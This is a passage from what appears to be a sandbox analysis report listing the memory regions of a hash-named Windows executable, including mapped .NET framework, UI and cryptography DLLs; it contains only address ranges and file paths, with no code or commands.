filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1498
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1499
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1500
start_va = 0x9d0000
end_va = 0xb50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009d0000"
filename = ""
Region:
id = 1501
start_va = 0xb60000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b60000"
filename = ""
Region:
id = 1502
start_va = 0x1f60000
end_va = 0x20e2fff
monitored = 1
entry_point = 0x20e3f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1503
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1508
start_va = 0x6cd20000
end_va = 0x6cd27fff
monitored = 0
entry_point = 0x6cd217b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1509
start_va = 0x1f60000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1510
start_va = 0x6bf40000
end_va = 0x6c4effff
monitored = 1
entry_point = 0x6bf8a848
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 1511
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1512
start_va = 0x6bea0000
end_va = 0x6bf3afff
monitored = 0
entry_point = 0x6bea232b
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll")
Region:
id = 1513
start_va = 0x550000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 1517
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1518
start_va = 0x550000
end_va = 0x550fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1519
start_va = 0x5c0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1520
start_va = 0x560000
end_va = 0x56ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 1521
start_va = 0x570000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 1522
start_va = 0x580000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 1523
start_va = 0x590000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1524
start_va = 0x5a0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1525
start_va = 0x5b0000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 1526
start_va = 0x7d0000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 1527
start_va = 0x2030000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 1528
start_va = 0x74a90000
end_va = 0x75e8efff
monitored = 0
entry_point = 0x74c4b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1529
start_va = 0x76fb0000
end_va = 0x76fe6fff
monitored = 0
entry_point = 0x76fb3b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1530
start_va = 0x764b0000
end_va = 0x769a8fff
monitored = 0
entry_point = 0x766b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 1531
start_va = 0x77180000
end_va = 0x7720cfff
monitored = 0
entry_point = 0x771c9b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 1532
start_va = 0x77210000
end_va = 0x77253fff
monitored = 0
entry_point = 0x77217410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1533
start_va = 0x75f50000
end_va = 0x75f5efff
monitored = 0
entry_point = 0x75f52e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1534
start_va = 0x810000
end_va = 0x810fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 1535
start_va = 0x2130000
end_va = 0x2466fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1536
start_va = 0x1f60000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1537
start_va = 0x2020000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 1538
start_va = 0x2470000
end_va = 0x446ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002470000"
filename = ""
Region:
id = 1539
start_va = 0x1f60000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1540
start_va = 0x4470000
end_va = 0x44affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004470000"
filename = ""
Region:
id = 1541
start_va = 0x44b0000
end_va = 0x45affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000044b0000"
filename = ""
Region:
id = 1542
start_va = 0x6b3a0000
end_va = 0x6be99fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll")
Region:
id = 1543
start_va = 0x76b10000
end_va = 0x76bfafff
monitored = 0
entry_point = 0x76b4d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1544
start_va = 0x45b0000
end_va = 0x4640fff
monitored = 0
entry_point = 0x45e8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1545
start_va = 0x70040000
end_va = 0x700b4fff
monitored = 0
entry_point = 0x70079a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1546
start_va = 0x45b0000
end_va = 0x47affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045b0000"
filename = ""
Region:
id = 1548
start_va = 0x2000000
end_va = 0x200ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1549
start_va = 0x2010000
end_va = 0x2012fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls")
Region:
id = 1550
start_va = 0x45b0000
end_va = 0x4732fff
monitored = 1
entry_point = 0x4733f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1551
start_va = 0x47a0000
end_va = 0x47affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047a0000"
filename = ""
Region:
id = 1552
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1553
start_va = 0x45b0000
end_va = 0x45effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045b0000"
filename = ""
Region:
id = 1554
start_va = 0x47b0000
end_va = 0x4c7dfff
monitored = 0
entry_point = 0x4c2c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1555
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1556
start_va = 0x6abf0000
end_va = 0x6b392fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\2dcc35955cda7c1279cec70d8a3ac1c1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\2dcc35955cda7c1279cec70d8a3ac1c1\\system.ni.dll")
Region:
id = 1557
start_va = 0x45f0000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045f0000"
filename = ""
Region:
id = 1558
start_va = 0x4600000
end_va = 0x460ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 1559
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1560
start_va = 0x4610000
end_va = 0x46abfff
monitored = 0
entry_point = 0x469921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1561
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1562
start_va = 0x6ab90000
end_va = 0x6abeafff
monitored = 1
entry_point = 0x6abd9010
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll")
Region:
id = 1563
start_va = 0x46b0000
end_va = 0x46b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000046b0000"
filename = ""
Region:
id = 1564
start_va = 0x46c0000
end_va = 0x46cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046c0000"
filename = ""
Region:
id = 1565
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1566
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1567
start_va = 0x46e0000
end_va = 0x4785fff
monitored = 0
entry_point = 0x476e14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1568
start_va = 0x4790000
end_va = 0x479ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004790000"
filename = ""
Region:
id = 1569
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1570
start_va = 0x4c80000
end_va = 0x4c8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c80000"
filename = ""
Region:
id = 1571
start_va = 0x4c90000
end_va = 0x4c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c90000"
filename = ""
Region:
id = 1572
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1573
start_va = 0x4ca0000
end_va = 0x4caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 1574
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1575
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1576
start_va = 0x7fe60000
end_va = 0x7feaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe60000"
filename = ""
Region:
id = 1577
start_va = 0x7fe50000
end_va = 0x7fe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe50000"
filename = ""
Region:
id = 1578
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1579
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1580
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1581
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1582
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1583
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1584
start_va = 0x4ca0000
end_va = 0x4caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 1585
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1586
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1587
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1588
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1589
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1590
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1591
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1592
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1593
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1594
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1595
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1596
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1597
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1598
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1599
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1600
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1601
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1602
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1603
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1604
start_va = 0x4cb0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 1605
start_va = 0x4cc0000
end_va = 0x4ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 1606
start_va = 0x4cd0000
end_va = 0x4cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 1607
start_va = 0x6f880000
end_va = 0x6f89cfff
monitored = 0
entry_point = 0x6f883b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1608
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1609
start_va = 0x46d0000
end_va = 0x46d7fff
monitored = 0
entry_point = 0x46d3fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1610
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1611
start_va = 0x4cb0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 1612
start_va = 0x4cb0000
end_va = 0x4cb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cb0000"
filename = ""
Region:
id = 1613
start_va = 0x4cb0000
end_va = 0x4cb1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cb0000"
filename = ""
Region:
id = 1614
start_va = 0x74120000
end_va = 0x7423efff
monitored = 0
entry_point = 0x74165980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1615
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cc0000"
filename = ""
Region:
id = 1616
start_va = 0x4ce0000
end_va = 0x4d9bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004ce0000"
filename = ""
Region:
id = 1617
start_va = 0x4cc0000
end_va = 0x4cc3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cc0000"
filename = ""
Region:
id = 1618
start_va = 0x4da0000
end_va = 0x4daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004da0000"
filename = ""
Region:
id = 1619
start_va = 0x4da0000
end_va = 0x4daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004da0000"
filename = ""
Region:
id = 1620
start_va = 0x4db0000
end_va = 0x4db3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004db0000"
filename = ""
Region:
id = 1621
start_va = 0x4dc0000
end_va = 0x4dc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004dc0000"
filename = ""
Region:
id = 1622
start_va = 0x4dd0000
end_va = 0x4ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 1623
start_va = 0x4de0000
end_va = 0x4deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004de0000"
filename = ""
Region:
id = 1624
start_va = 0x4dd0000
end_va = 0x4dd1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004dd0000"
filename = ""
Region:
id = 1625
start_va = 0x4de0000
end_va = 0x4de0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004de0000"
filename = ""
Region:
id = 1626
start_va = 0x4df0000
end_va = 0x4df4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 1627
start_va = 0x4e00000
end_va = 0x4e04fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004e00000"
filename = ""
Region:
id = 1628
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 1629
start_va = 0x4e20000
end_va = 0x4e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1630
start_va = 0x6fe40000
end_va = 0x6fe52fff
monitored = 0
entry_point = 0x6fe49950
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1631
start_va = 0x6fe10000
end_va = 0x6fe3efff
monitored = 0
entry_point = 0x6fe295e0
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1632
start_va = 0x73c30000
end_va = 0x73c4afff
monitored = 0
entry_point = 0x73c39050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1633
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 1634
start_va = 0x4e20000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1635
start_va = 0x4e20000
end_va = 0x4e23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1636
start_va = 0x4f20000
end_va = 0x4f2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f20000"
filename = ""
Region:
id = 1637
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 1638
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 1639
start_va = 0x4e50000
end_va = 0x4e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e50000"
filename = ""
Region:
id = 1640
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 1641
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 1642
start_va = 0x6ab80000
end_va = 0x6ab85fff
monitored = 0
entry_point = 0x6ab81570
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll")
Region:
id = 1643
start_va = 0x6ab70000
end_va = 0x6ab77fff
monitored = 1
entry_point = 0x6ab73809
region_type = mapped_file
name = "culture.dll"
